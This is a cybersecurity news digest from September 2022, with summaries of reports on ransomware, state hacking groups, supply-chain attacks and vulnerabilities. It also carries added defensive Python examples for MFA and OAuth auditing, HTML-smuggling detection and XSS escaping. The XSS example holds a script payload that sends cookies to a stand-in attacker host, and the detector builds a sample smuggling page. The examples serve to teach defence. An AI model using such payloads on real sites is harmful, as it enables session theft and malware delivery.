Saturday, Sept 24, 2022 // (IG): BB // Sponsor: Buy me a whiskey
N.Korea says it has never supplied weapons or ammunition to Russia
FROM THE MEDIA: North Korea on Thursday said it has never supplied weapons or ammunition to Russia and has no plans to do so, while warning the United States to "keep its mouth shut" and stop circulating rumours aimed at "tarnishing" the country's image. "Recently, the U.S. and other hostile forces talked about the 'violation of a resolution' of the UNSC, spreading a 'rumour of arms dealings' between the DPRK and Russia.
READ THE STORY: Yahoo
Undercover with Russia’s fake arms dealers
FROM THE MEDIA: Russian state TV claims Ukrainians are selling US-donated weapons on the dark web. The BBC investigated one such marketplace, spoke undercover to those apparently selling weapons, and gathered evidence that suggests the adverts for weapons are fake. "Ukrops [a derogatory Russian slang term used to refer to Ukrainians] are selling Javelins on the darknet.
READ THE STORY: BBC
Australia’s second-largest wireless carrier suffers major cyberattack
FROM THE MEDIA: Critical infrastructure systems, including telecom networks, frequently grapple with cyberthreats, as evidenced by a recent spate of attacks. The Los Angeles school district earlier this month was hit by a potentially disastrous ransomware attack, the implications of which are still playing out. T-Mobile continues to deal with the consequences of a 2021 cyberattack that exposed personal data of at least 76 million people.
READ THE STORY: CyberSecurity Dive
Hackers Take Over Microsoft Exchange Servers with OAuth Apps
FROM THE MEDIA: On September 23, 2022, a Microsoft Security blog post stated that the "threat actor launched credential stuffing attacks against high-risk accounts that didn’t have multi-factor authentication (MFA) enabled and leveraged the unsecured administrator accounts to gain initial access". By accessing the cloud tenant, the attacker was able to register a phony OAuth application with elevated permissions.
READ THE STORY: MUO // HackRead
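The two conditions the story describes, privileged accounts with no MFA and a freshly registered OAuth app holding broad application permissions, are both things a tenant owner can check from a directory export. The script below is an added example, not code from Microsoft or from the articles; it runs over a constructed snapshot whose field names are modeled on Microsoft Graph responses (userRegistrationDetails, servicePrincipal appRoleAssignments) but are assumptions here, and the permission watchlist is likewise an assumed starting point rather than an authoritative list.

```python
"""Triage a directory snapshot for the preconditions in the OAuth-app story:
admin accounts without MFA, and recently created apps granted high-privilege
application permissions. Added example; input data is constructed and the
field names are assumptions modeled on Microsoft Graph, not the page's data."""
from datetime import datetime, timedelta, timezone

# Application permissions that let an app act on every mailbox or rewrite the
# tenant without a signed-in user (assumed watchlist; extend for your tenant).
HIGH_RISK_APP_ROLES = {
    "Exchange.ManageAsApp",
    "Mail.ReadWrite",
    "Mail.Send",
    "Directory.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
}

# Constructed snapshot of user MFA registration state.
USERS = [
    {"userPrincipalName": "ga-admin@contoso.example", "isAdmin": True, "isMfaRegistered": False},
    {"userPrincipalName": "exo-admin@contoso.example", "isAdmin": True, "isMfaRegistered": True},
    {"userPrincipalName": "alice@contoso.example", "isAdmin": False, "isMfaRegistered": False},
]

# Constructed snapshot of service principals and the app roles granted to them.
SERVICE_PRINCIPALS = [
    {"displayName": "Contoso HR Sync", "createdDateTime": "2021-03-02T10:00:00Z",
     "appRoles": ["User.Read.All"]},
    {"displayName": "MailSvc", "createdDateTime": "2022-09-20T03:12:44Z",
     "appRoles": ["Exchange.ManageAsApp", "Mail.Send"]},
    {"displayName": "Ticket Bot", "createdDateTime": "2022-09-22T08:00:00Z",
     "appRoles": ["User.Read"]},
]

# Fixed "now" so the example is reproducible (assumed: the digest's date).
NOW = datetime(2022, 9, 24, tzinfo=timezone.utc)


def admins_without_mfa(users):
    """Return admin UPNs that have no MFA method registered, sorted."""
    return sorted(u["userPrincipalName"] for u in users
                  if u["isAdmin"] and not u["isMfaRegistered"])


def suspicious_apps(sps, now=NOW, window_days=30):
    """Return (name, risky_roles) for apps created inside the window that hold
    any watchlisted application permission."""
    cutoff = now - timedelta(days=window_days)
    hits = []
    for sp in sps:
        created = datetime.fromisoformat(sp["createdDateTime"].replace("Z", "+00:00"))
        risky = HIGH_RISK_APP_ROLES.intersection(sp["appRoles"])
        if created >= cutoff and risky:
            hits.append((sp["displayName"], sorted(risky)))
    return hits


if __name__ == "__main__":
    for upn in admins_without_mfa(USERS):
        print(f"admin without MFA: {upn}")
    for name, roles in suspicious_apps(SERVICE_PRINCIPALS):
        print(f"recent high-privilege app: {name} -> {', '.join(roles)}")
```

Both checks are cheap enough to run on a schedule; the second one is the one that would have surfaced an app like the one in the story, because a legitimate integration rarely needs tenant-wide mailbox rights on the day it is registered.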
Cyber mercenaries
FROM THE MEDIA: SentinelLabs yesterday published an update on the Void Balaur cyber mercenary group. The hack-for-hire operation, which has operated in the criminal-to-criminal market since 2016, has expanded its activities. "New targets include a wide variety of industries, often with particular business or political interests tied to Russia." It's not generally clear who the group's customers are, but SentinelLabs points to some indications that a Russian security service may be among them.
READ THE STORY: The Cyberwire
What We Know About The Grand Theft Auto VI Data Breach
FROM THE MEDIA: On September 18, a cyber threat actor named “teapotuberhacker” posted on GTAForums.com claiming to have hacked Rockstar Games, the creator of the popular and controversial Grand Theft Auto (GTA) series. In that post, which has since been deleted, teapotuberhacker claimed to have stolen source code for Rockstar’s extremely anticipated Grand Theft Auto VI as well as its predecessor GTA V, in addition to 90 videos of alpha footage.
READ THE STORY: Security Boulevard
UK Police arrests teen believed to be behind Uber, Rockstar hacks
FROM THE MEDIA: The City of London police announced on Twitter today the arrest of a British 17-year-old teen suspected of being involved in recent cyberattacks. In a short tweet shared by law enforcement, the teen was arrested in Oxfordshire as part of a hacking investigation supported by the UK's National Crime Agency. BleepingComputer has reached out to the NCA and City of London police to learn more about this investigation.
READ THE STORY: Bleeping Computer
Malicious NPM package discovered in supply chain attack
FROM THE MEDIA: A developer tool has become the lure for a new supply chain scam aimed at poisoning software packages and causing downstream havoc. Researchers with ReversingLabs said the Material Tailwind library is being impersonated for an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories, intended to trick unwitting developers into using the package in place of the real library.
READ THE STORY: TechTarget
APT41 spear-phishing, supply chain campaigns target pharma, healthcare
FROM THE MEDIA: A new Department of Health and Human Services Cybersecurity Coordination Center alert warns the healthcare sector is continuing to be targeted by APT41, a Chinese state-sponsored threat actor group actively tracked by researchers since 2012. APT41 has a history of targeting the healthcare sector, as well as the pharmaceuticals and high-tech industries, among others. The group makes frequent use of spear-phishing, water holes, supply chain attacks, and backdoors to gain access to the network for learning insights into the specific industry and gathering data to inform future attacks.
READ THE STORY: SCMAG
New security vulnerability in Oracle Cloud Infrastructure discovered
FROM THE MEDIA: A new vulnerability in Oracle Cloud Infrastructure (OCI) could have allowed unauthorized access to cloud storage volumes of all users, thereby violating cloud isolation. The security flaw, discovered by secure cloud experts at Wiz in June and dubbed AttachMe, is now being discussed in a new advisory the company published this week. According to Wiz, the vulnerability is one of the most severe cloud vulnerabilities reported since it could have impacted all OCI customers.
READ THE STORY: Security Magazine
Metador: a so-far unattributed threat actor
FROM THE MEDIA: SentinelLabs yesterday reported another threat actor that looks like the work of a nation-state. "Metador" is described as targeting "telecommunications, internet service providers, and universities in several countries in the Middle East and Africa." It's not known who Metador is, nor whom the group is working for, but they show a high degree of operational security and situational awareness of the environments in which they operate.
READ THE STORY: The Cyberwire
CISA adds Zoho ManageEngine vulnerability to KEV catalog
FROM THE MEDIA: Researchers at Nucleus Security on Friday posted a blog that explained how the Zoho ManageEngine vulnerability discovered earlier this month was elevated and uploaded to the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities (KEV) catalog. Ryan Cribelar, the vulnerability research engineer at Nucleus Security who posted the blog, said CISA uploaded CVE-2022-35405 on Thursday when the agency determined that there was enough evidence that the vulnerability actually was exploited in the wild.
READ THE STORY: SCMAG
Iran blocks Whatsapp, Instagram as citizens protest death of Mahsa Amini
FROM THE MEDIA: Iran is experiencing a near-total internet service disruption in the west and intermittent interruptions nationwide, with access to Instagram, WhatsApp and some mobile networks being blocked, says Netblocks. While Twitter and Facebook were banned in Iran years ago, Instagram and WhatsApp remained among the few accessible social media platforms in the country. That is, until Wednesday when the two apps were choked.
READ THE STORY: The Register
This dangerous Android spyware could affect millions of devices
FROM THE MEDIA: An updated version of the Banker Android spyware has been detected, stealing victims' banking details and possibly even money in some cases. According to cybersecurity researchers from Microsoft, an unknown threat actor has initiated a smishing campaign (SMS phishing), through which it tries to trick people into downloading TrojanSpy:AndroidOS/Banker.O.
READ THE STORY: TechRadar
SEO poisoning campaign directs search engine visitors from multiple industries to JavaScript malware
FROM THE MEDIA: Researchers have discovered a high-effort search engine optimization (SEO) poisoning campaign that seems to be targeting employees from multiple industries and government sectors when they search for specific terms that are relevant to their work. Clicking on the malicious search results, which are artificially pushed higher in ranking, leads visitors to a known JavaScript malware downloader.
READ THE STORY: CSO
Quad Foreign Ministers’ Statement on Ransomware
FROM THE MEDIA: We, the Foreign Ministers of Australia, India, and Japan and the Secretary of State of the United States, met in New York on September 23, 2022. We reaffirm the Quad’s commitment to supporting Indo-Pacific countries’ advancement of a free and open Indo-Pacific, which is inclusive and rules-based. We are committed to an open, secure, stable, accessible, and peaceful cyberspace and support regional initiatives to enhance the capacity of countries to implement the UN Framework for Responsible State Behavior in Cyberspace.
READ THE STORY: DoS
New ransomware variants, tactics rattle financial industry
FROM THE MEDIA: Since its emergence on the popular cyber scene in 2016, ransomware has not only afflicted virtually every major industry — including financial services — but it has evolved in leaps and bounds in ways that have made it increasingly difficult to fend off or mitigate. At a basic level, ransomware uses malware to encroach on corporate systems to encrypt and lock up the company’s data and systems and demand payment to turn control back over to the company.
READ THE STORY: SCMAG
Colonial Pipeline ransomware group using new tactics to become more dangerous
FROM THE MEDIA: The ransomware known as Darkside gained a level of infamy in May of 2021 when it was used in a devastating attack against Colonial Pipeline, a company responsible for delivering oil and gas across the East Coast. Now the cybercriminals behind Darkside are using new ransomware with new tools and tactics that make them even more of a threat. In a report published Thursday, security firm Symantec detailed the latest activities and methods used by Coreid to victimize organizations with ransomware.
READ THE STORY: TechRepublic
Microsoft Issues Out-of-Band Patch for Flaw Allowing Lateral Movement, Ransomware Attacks
FROM THE MEDIA: The vulnerability is tracked as CVE-2022-37972 and it has been described by Microsoft as a medium-severity spoofing issue. The tech giant has credited Brandon Colley of Trimarc Security for reporting the flaw. In its advisory, Microsoft said there is no evidence of exploitation, but the vulnerability has been publicly disclosed.
READ THE STORY: Security Week
Accused Russian RSOCKS Botmaster Arrested, Requests Extradition to U.S.
FROM THE MEDIA: A 36-year-old Russian man recently identified by KrebsOnSecurity as the likely proprietor of the massive RSOCKS botnet has been arrested in Bulgaria at the request of U.S. authorities. At a court hearing in Bulgaria this month, the accused hacker requested and was granted extradition to the United States, reportedly telling the judge, “America is looking for me because I have enormous information and they need it.”
READ THE STORY: Security Boulevard
NSA and CISA: Here's how hackers are going after critical systems, and what you need to do about it
FROM THE MEDIA: The National Security Agency and the Cybersecurity and Infrastructure Security Agency have issued an advisory explaining how to thwart cyberattacks on operational technology (OT) and industrial control system (ICS) assets. The new joint advisory outlines what critical infrastructure operators should know about their opponents, citing recent cyberattacks on Ukraine's energy grid and the ransomware attack against a fuel distribution pipeline.
READ THE STORY: ZDNET
Israel Bolsters Digital Defense amid Iran Cyber Threat
FROM THE MEDIA: At the height of the pandemic just over two years ago, Iranian hackers struck several Israeli water facilities, in an unprecedented cyber attack on the country’s civilian infrastructure. They are believed to have hacked into pump-operating software after routing through American and European servers to try to conceal their identity. If the operation had not been detected, water supplies would have been severely disrupted and chemicals, including chlorine, raised to dangerously high levels.
READ THE STORY: Geopolitical Monitor
Sophos warns of new firewall RCE bug exploited in attacks
FROM THE MEDIA: Sophos warned today that a critical code injection security vulnerability in the company's Firewall product is being exploited in the wild. "Sophos has observed this vulnerability being used to target a small set of specific organizations, primarily in the South Asia region," the security software and hardware vendor warned. "We have informed each of these organizations directly. Sophos will provide further details as we continue to investigate."
READ THE STORY: Bleeping Computer
Portuguese President Says Had Personal Data Stolen During TAP Airline Hack
FROM THE MEDIA: Portuguese President Marcelo Rebelo de Sousa's personal data was hacked during the Ragnar Locker ransomware attack on his country's flagship airline TAP, according to his official message posted on Friday. Rebelo de Sousa said he immediately took precautions regarding his email address which was the only detail not generally known, since his full name, date of birth and address are all public knowledge.
READ THE STORY: Urdupoint
Scammers stole tens of millions since 2019 using online credit card scheme
FROM THE MEDIA: Researchers on Friday uncovered what they claim may be one of the largest fraudulent online credit card schemes active today. The bad actors duped payment providers into accepting payments, and then the scammers used fake credit card numbers purchased on the dark web to receive fraudulent payments. In a blog post, ReasonLabs researchers said this widespread global credit card scam has been operating since 2019 and has amassed tens of millions of dollars in fraud from the stolen credit card numbers of tens of thousands of individuals.
READ THE STORY: SCMAG
A GRU campaign masquerades as Ukrainian telecommunications providers
FROM THE MEDIA: Recorded Future's Insikt Group reports that the GRU has established new infrastructure for cyberespionage against Ukrainian targets. The threat actor UAC-0113 (which CERT-UA thinks is probably associated with the GRU's Sandworm operation) is using dynamic DNS domains as it masquerades as telecommunications providers. It uses HTML smuggling to distribute Colibri Loader and the Warzone remote access Trojan (RAT). The objectives of the campaign remain unclear, but Recorded Future thinks it's a Russian combat support effort.
READ THE STORY: The Cyberwire
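The campaign above delivers its loaders by HTML smuggling, where the HTML page carries the payload as an encoded string and browser-side JavaScript reassembles it into a file and triggers a download, so nothing on the wire looks like an executable. The detector below is an added example, not code from Recorded Future or CERT-UA; it scores HTML bodies on the JavaScript constructs that technique needs (Blob construction, object URLs, base64 decoding, a programmatic download), and the indicator list, the threshold, and the two sample pages are all constructed assumptions to be tuned against real mail or proxy captures.

```python
"""Heuristic detector for HTML smuggling pages. Added example; the indicator
list and threshold are assumptions, and both sample documents are constructed."""
import re

# JavaScript constructs a smuggling page typically combines to build a file in
# the browser and hand it to the user (assumed indicator set).
INDICATORS = {
    "blob_ctor": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob"),
    "base64_decode": re.compile(r"\batob\s*\("),
    "download_attr": re.compile(r"\.download\s*=|download\s*=\s*[\"']"),
    "programmatic_click": re.compile(r"\.click\s*\(\s*\)"),
}
# A single quoted base64 literal of a few KB or more is the embedded payload.
BIG_B64 = re.compile(r"[\"'][A-Za-z0-9+/=]{2000,}[\"']")


def score_html(html):
    """Return (score, reasons) for one HTML body."""
    reasons = [name for name, rx in INDICATORS.items() if rx.search(html)]
    if BIG_B64.search(html):
        reasons.append("large_base64_literal")
    return len(reasons), reasons


def is_smuggling(html, threshold=4):
    """True when enough independent indicators co-occur in the same page."""
    return score_html(html)[0] >= threshold


# Constructed sample: the shape of a smuggling page (payload is filler, not a file).
SMUGGLE_SAMPLE = (
    "<html><body><p>Your document is loading...</p><script>\n"
    'var payload = "' + "A" * 2500 + '";\n'
    "var raw = atob(payload);\n"
    "var bytes = new Uint8Array(raw.length);\n"
    "for (var i = 0; i < raw.length; i++) { bytes[i] = raw.charCodeAt(i); }\n"
    "var blob = new Blob([bytes], {type: 'application/octet-stream'});\n"
    "var a = document.createElement('a');\n"
    "a.href = URL.createObjectURL(blob);\n"
    "a.download = 'invoice.iso';\n"
    "document.body.appendChild(a); a.click();\n"
    "</script></body></html>"
)

# Constructed sample: benign page that happens to decode a short base64 token.
BENIGN_SAMPLE = (
    "<html><body><script>\n"
    'var t = atob("aGVsbG8=");\n'
    "document.getElementById('greeting').textContent = t;\n"
    "</script><div id='greeting'></div></body></html>"
)


if __name__ == "__main__":
    for label, doc in (("smuggle", SMUGGLE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        score, why = score_html(doc)
        print(f"{label}: score={score} flagged={is_smuggling(doc)} reasons={why}")
```

The point of scoring rather than matching a single string is that each construct is common on its own; `atob` alone flags half the web, but `atob` plus a Blob, an object URL, a forced download and a multi-kilobyte literal in one small page is a narrow pattern. Run it over attachments and proxy-logged HTML responses, and treat a hit as a reason to detonate, not as a verdict.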
So you think cross-site scripting isn’t a big deal
FROM THE MEDIA: Cross-site scripting (XSS) vulnerabilities have always been the most numerous class of web application security issues. They are easy to introduce but much harder to find and remediate, which increases the risk of them making it into production code. This is reinforced by the misconception that web security is all about protecting the server, and since XSS can only affect the client, it is a low-risk vulnerability with limited impact. In reality, cross-site scripting can be (and is) used by cybercriminals as a stepping stone to more elaborate attacks targeted at end users.
READ THE STORY: Security Boulevard
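The article's point is that XSS matters because injected script runs with the victim's session, so the "client-only" framing undersells it. The example below is added here and is not from the article: a minimal search page rendered two ways, the vulnerable string-concatenation version beside a hardened version that escapes output for the HTML context and ships the response with an HttpOnly session cookie and a script-restricting Content-Security-Policy, so that even a missed escape cannot read the cookie or load attacker script from elsewhere. The handler, header values and payload are constructed for illustration.

```python
"""Reflected XSS: vulnerable rendering beside the hardened version.
Added example; the page template, headers and payload are constructed."""
import html

# Constructed attacker input: script that would ship the session cookie off-site.
PAYLOAD = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'


def render_unsafe(query):
    """Vulnerable: user input is concatenated straight into the HTML body."""
    return f"<h1>Results for: {query}</h1>"


def render_safe(query):
    """Hardened: escape for the HTML text context. quote=True also makes the
    value safe inside a quoted attribute, which is the other common sink."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def response_headers(session_id):
    """Defense in depth for the case where an escape is missed somewhere:
    HttpOnly keeps document.cookie from exposing the session, and the CSP
    refuses inline script and any script host other than the page's own."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_script_tag(rendered):
    """Check used below: does the rendered body contain a live <script> element?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD))
    print("safe:  ", render_safe(PAYLOAD))
    for k, v in response_headers("abc123").items():
        print(f"{k}: {v}")
```

Escaping is the fix; the cookie flag and CSP are there so that the next missed escape is a defaced heading rather than a stolen session. Note that `html.escape` is only correct for the HTML text and attribute contexts; input that lands inside a `<script>` block, a URL, or CSS needs the encoder for that context.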
Shanghai Cooperation Organization summit could herald an approaching cold war
FROM THE MEDIA: Formed in 2001, the Shanghai Cooperation Organization (SCO) is an economic and political partnership helmed by China and Russia, and at the SCO summit last week, several countries including Iran, Turkey, and Myanmar announced their plans to join the partnership. With two major authoritarian governments at the wheel, the SCO promotes political and infrastructural strategies to maintain a protectionist attitude toward trade and social control over the countries’ citizens, and, as MIT Technology Review explains, this includes the use of technology that supports what experts call “digital authoritarianism.”
READ THE STORY: The Cyberwire
U.S. arms control talks with Russia a 'challenge' after Ukraine: diplomat
FROM THE MEDIA: Resuming dialogue with Russia toward a new nuclear arms treaty would be a "challenge" amid Moscow's invasion of Ukraine, a senior U.S. State Department official says, while also noting little progress on proposed nuclear talks with China. Bonnie Jenkins, appointed in July 2021 as undersecretary for arms control and international security, spoke with Nikkei on Thursday. The Biden administration had opened a strategic stability dialogue with Moscow, looking toward a successor to the New Strategic Arms Reduction Treaty -- or New START -- now set to expire in 2026.
READ THE STORY: Nikkei Asia
The pandemic turned out to be a boon for public-private cybersecurity cooperation
FROM THE MEDIA: The security headaches created by the COVID pandemic are well known. A massive shift from in-office to remote work in the early months of 2020 resulted in huge dislocations for IT and security groups, extending already porous network “perimeters” to hundreds or thousands of employee home offices and VPN connections. Sophisticated cyber adversaries piled on, exploiting remote worker connections to gain a foothold inside corporate IT environments and wreak havoc. Case in point: the May 2021 compromise of Colonial Pipeline, which resulted in the shutdown of a pipeline that supplies petroleum to the U.S. East Coast.
READ THE STORY: Security Boulevard
Gootloader uses blogging and SEO poisoning to attract victims
FROM THE MEDIA: Deepwatch describes how Gootloader uses well-planned and targeted blogs (with translation services and suggested links) in a search-engine-optimization (SEO) poisoning campaign. The operators appear to be trawling for users interested in topics related to "government, legal, healthcare, real estate, and education." Geographically, many countries are targeted, but most attention seems to be paid to the Five Eyes: Australia, Canada, New Zealand, the United Kingdom, and the United States. The operation looks like one run on behalf of a nation-state intelligence service, but Deepwatch offers no attribution.
READ THE STORY: The Cyberwire
Items of interest
US to expand internet access to help Iranians evade state surveillance
FROM THE MEDIA: The US Treasury Department on Friday issued guidance expanding the range of internet services available to Iranians despite US sanctions on the country, amid protests around Iran after the death of a 22-year-old woman in custody. Officials said the move would help Iranians access tools that can be used to circumvent state surveillance and censorship, but would not entirely prevent Tehran from using communications tools to stifle dissent, as it did by cutting off internet access for most citizens on Wednesday.
READ THE STORY: The Guardian
Why Social Engineering is So Effective (Video)
FROM THE MEDIA: The fabric of social media is an ideal attack vector for influence campaigns, in which internet users and their thoughts get targeted. There are underlying reasons that certain social engineering techniques are so effective. These are often called the principles.
Hunting Down Incel Extremists (Video)
FROM THE MEDIA: Extreme far-right terrorism is increasing. Julia Ebner believes in order to deal with this threat, you have to fully understand the extremist groups. From neo-Nazis to ISIS hackers, Julia Ebner goes undercover online to some of the darkest corners of the internet.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com